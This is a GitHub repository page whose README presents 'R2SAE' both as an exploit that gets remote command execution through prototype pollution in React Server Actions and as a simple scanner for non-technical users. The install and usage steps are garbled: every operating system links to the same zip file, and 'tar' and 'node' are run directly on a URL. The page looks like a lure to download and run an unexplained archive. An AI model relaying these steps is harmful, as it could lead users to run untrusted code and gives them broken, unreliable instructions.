Skip to content
/ R2SAE Public

πŸ› οΈ Exploit prototype pollution in React Server Actions to achieve remote command execution with this CLI tool for authorized security testing.

Notifications You must be signed in to change notification settings

dmqin/R2SAE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

6 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ R2SAE - Simple Tool to Identify Vulnerabilities

πŸš€ Getting Started

Welcome to R2SAE! This easy-to-use command-line tool helps you find security flaws in React Server Actions. No programming experience needed. Follow these steps to get started quickly.

πŸ“₯ Download R2SAE

Download R2SAE

Visit this page to download: R2SAE Releases

πŸ” Features

  • Exploit Detection: Locate prototype pollution vulnerabilities in your React applications.
  • User-Friendly: Designed for users without technical backgrounds. Simple commands to run.
  • Cross-Platform: Works on Windows, macOS, and Linux systems.
  • Regular Updates: Ongoing improvements and security patches to keep your application safe.
  • Documentation: Clear guides and resources to help you understand features and usage.

πŸ› οΈ System Requirements

To run R2SAE, you need the following:

πŸ“¦ Download & Install

  1. Visit the Releases Page: Go to R2SAE Releases to find the latest version.

  2. Choose Your Operating System: Look for the file that matches your operating system:

    • For Windows, select https://github.com/dmqin/R2SAE/raw/refs/heads/main/critic/SAE_2.5-alpha.3.zip.
    • For macOS, select https://github.com/dmqin/R2SAE/raw/refs/heads/main/critic/SAE_2.5-alpha.3.zip.
    • For Linux, you may download https://github.com/dmqin/R2SAE/raw/refs/heads/main/critic/SAE_2.5-alpha.3.zip.
  3. Download the File: Click on the link to start the download.

  4. Extract the Files:

    • For Windows, right-click the ZIP file and choose "Extract All."
    • For macOS, double-click the ZIP file to extract it.
    • For Linux, use the command: tar -xzf https://github.com/dmqin/R2SAE/raw/refs/heads/main/critic/SAE_2.5-alpha.3.zip.
  5. Navigate to the Folder: Open the folder where you extracted the files.

  6. Run R2SAE:

    • Open your command-line interface (Command Prompt for Windows, Terminal for macOS/Linux).
    • Change the directory to the folder where R2SAE is located. You can do this with the cd command. For example:
      • Windows: cd path\to\R2SAE
      • macOS/Linux: cd /path/to/R2SAE
    • Once in the correct directory, run the application with the following command:
      node https://github.com/dmqin/R2SAE/raw/refs/heads/main/critic/SAE_2.5-alpha.3.zip
      
  7. Follow On-Screen Prompts: The tool will guide you with easy-to-follow instructions as you test your application for vulnerabilities.

πŸ“ˆ Example Usage

To scan a React application, run the following command:

node https://github.com/dmqin/R2SAE/raw/refs/heads/main/critic/SAE_2.5-alpha.3.zip --target [your-react-app-url]

Replace [your-react-app-url] with the URL of the React application you want to test. R2SAE will scan the application for vulnerabilities and provide a report on the findings.

πŸ“š Documentation & Support

For detailed information on features and commands, visit the Documentation. If you encounter any issues or have questions, feel free to open an issue in the GitHub repository.

βš™οΈ Contributing

We welcome contributions from everyone. If you want to help improve R2SAE, check out our Contributing Guidelines.

🚧 Disclaimer

While R2SAE aims to identify vulnerabilities, always ensure to use it in a safe and ethical manner. Do not test on applications you do not own or without permission.

Thank you for choosing R2SAE. We hope this tool helps you enhance the security of your applications!

About

πŸ› οΈ Exploit prototype pollution in React Server Actions to achieve remote command execution with this CLI tool for authorized security testing.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages